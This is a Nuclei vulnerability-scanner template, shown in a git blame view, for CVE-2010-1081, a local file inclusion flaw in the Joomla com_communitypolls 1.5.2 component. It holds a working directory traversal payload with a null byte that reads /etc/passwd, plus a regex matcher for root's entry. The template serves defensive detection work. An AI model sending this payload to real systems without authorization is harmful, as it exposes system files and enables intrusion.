nuclei-templates/http/cves/2010/CVE-2010-1081.yaml

41 lines
1.4 KiB
YAML
Raw Normal View History

id: CVE-2010-1081
2021-09-27 11:02:48 +00:00
info:
name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
author: daffainfo
2023-07-11 19:49:27 +00:00
severity: medium
description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
2021-09-27 13:06:48 +00:00
reference:
2021-09-27 11:02:48 +00:00
- https://www.exploit-db.com/exploits/11511
- https://nvd.nist.gov/vuln/detail/CVE-2010-1081
- http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html
remediation: Apply all relevant security patches and product upgrades.
classification:
2022-09-06 01:33:31 +00:00
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-1081
2022-09-06 01:33:31 +00:00
cwe-id: CWE-22
2023-07-11 19:49:27 +00:00
epss-score: 0.02282
cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.88237
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: corejoomla
product: com_communitypolls
tags: cve,cve2010,joomla,lfi,edb
http:
2021-09-27 11:02:48 +00:00
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
2023-07-11 19:49:27 +00:00
2021-09-27 11:02:48 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2023-07-11 19:49:27 +00:00
2021-09-27 11:02:48 +00:00
- type: status
status:
- 200